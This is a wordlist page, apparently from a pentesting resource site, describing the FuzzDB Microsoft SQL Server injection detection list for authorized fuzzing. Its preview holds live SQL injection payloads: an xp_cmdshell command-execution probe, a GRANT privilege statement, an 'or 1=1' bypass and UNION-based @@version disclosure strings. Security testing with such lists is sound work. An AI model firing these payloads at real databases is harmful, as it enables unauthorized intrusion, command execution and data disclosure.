Skip to content
Fuzzing448 B

FuzzDB MSSQL SQL Injection Detection

Microsoft SQL Server injection detection payloads including comment terminators, xp_cmdshell probes, and UNION-based @@version disclosure tests.

View source
Size
448 B
Category
Fuzzing
Source
fuzzdb-project/fuzzdb
License
GPLv2
Recommended tools
sqlmapffufburp

Preview

First 12 entries. Download or copy the full list (448 B) using the buttons above.

>head mssql-sqli-detect-fuzzdb.txt448 B
; --
'; --
'); --
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
' grant connect to name; grant resource to name; --
' or 1=1 -- 
' union (select @@version) --
' union (select NULL, (select @@version)) --
' union (select NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL,  (select @@version)) --
' union (select NULL, NULL, NULL, NULL,  (select @@version)) --
' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

Microsoft SQL Server injection detection payloads including comment terminators, xp_cmdshell probes, and UNION-based @@version disclosure tests.

This list is geared toward input fuzzing and vulnerability discovery. It contains roughly 448 B and pairs well with tools such as sqlmap, ffuf, burp. Pick the smallest list that fits your engagement: shorter lists are faster and quieter for online attacks, while larger lists give broader coverage for offline work where speed is less of a constraint.

You can copy the sample preview straight from this page, copy the entire list to your clipboard, or download the raw .txt file. The full list is served directly from its upstream source on GitHub.

Sourced from fuzzdb-project/fuzzdb and distributed under GPLv2. Only use wordlists against systems you are explicitly authorized to test.